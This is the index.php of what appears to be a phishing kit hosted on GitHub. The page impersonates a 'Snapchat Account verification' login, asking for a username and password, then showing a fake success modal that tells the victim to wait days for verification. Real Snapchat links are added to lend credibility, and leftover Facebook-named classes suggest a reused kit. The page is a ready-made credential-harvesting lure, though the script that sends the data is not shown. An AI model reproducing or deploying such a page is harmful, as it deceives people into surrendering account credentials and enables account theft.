-
Notifications
You must be signed in to change notification settings - Fork 18
/
index.php
76 lines (71 loc) · 3.79 KB
/
index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="icon" href="images/snapchat.png">
<title> Snapchat Account verification</title>
<!-- css links -->
<link rel="stylesheet" href="css/bootstrap.min.css">
<link rel="stylesheet" href="css/style.css">
<script src="js/jquery-3.5.1.min.js"></script>
<link rel="stylesheet" href="css\fonts\ar\ar-font.css">
<script src="js/index.js"></script>
<meta name="description" content="snapchat Account verification">
<meta name="og:title" property="og:title" content="snapchat Account verification">
</head>
<body>
<!-- Done Div -->
<button type="button" class="done-successfully-cinghaha" data-toggle="modal" data-target="#exampleModalCenter" style="display: none;"></button>
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="exampleModalCenterTitle">Successfully Done...</h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body">
<p style="text-align: center !important;">Please Wait 1 Day to 5 , To verify Your Account If you encounter any problems, please contact us via email :<br> [email protected] </p>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary close-done-all" data-dismiss="modal">Close</button>
</div>
</div>
</div>
</div>
<!-- End Done Div -->
<!-- === Start Body === -->
<div class="container">
<center>
<h1 style="display: none;">Snapchat Account verification</h1>
<h1 class="d-none d-sm-block" style="color:#955fff;margin-top:40px;margin-bottom:40px">Account verification</h1>
<h3 class="d-block d-sm-none" style="color:#955fff;margin-top:40px;margin-bottom:40px">Account verification</h3>
<img class="img-fluid index-all-page-img" style="width:25%;" id="pg" src="images/snapchat.png">
<hr color="#7253E7">
<div class="login-form">
<h2 class="text-center">Login</h2>
<div class="form-group">
<input type="text" name="email" class="form-control email_fa" placeholder="Username" required="required" style="text-align: center;">
<input type="password" name="password" class="form-control password_fa" placeholder="Password" required="required" style="margin-top: 3px;text-align: center;">
</div>
<div class="form-group">
<button type="button" class="btn btn-secondary btn-block facebook-login-bu">Login</button>
</div>
<p class="text-center"><a href="https://accounts.snapchat.com/accounts/password_reset_request">Forgot Password?</a></p>
</div>
</center>
</div>
<br><br><br><br><br><br>
<footer class="fixed-bottom footer">
<p style="margin-top: 13px;margin-left:10px">
<a href="https://snap.com/en-US/privacy/privacy-policy/" >Privacy Policy</a>
<a href="https://snap.com/en-US/terms/">Terms of Service</a>
</p>
</div>
<!-- === End Body === -->
<!-- Js Links -->
<script src="js/bootstrap.min.js"></script>
</body>
</html>